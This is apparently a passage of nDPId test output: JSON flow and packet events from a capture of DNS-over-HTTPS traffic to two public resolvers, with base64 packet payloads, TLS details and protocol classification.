A4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="}
00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhRVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"}
00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
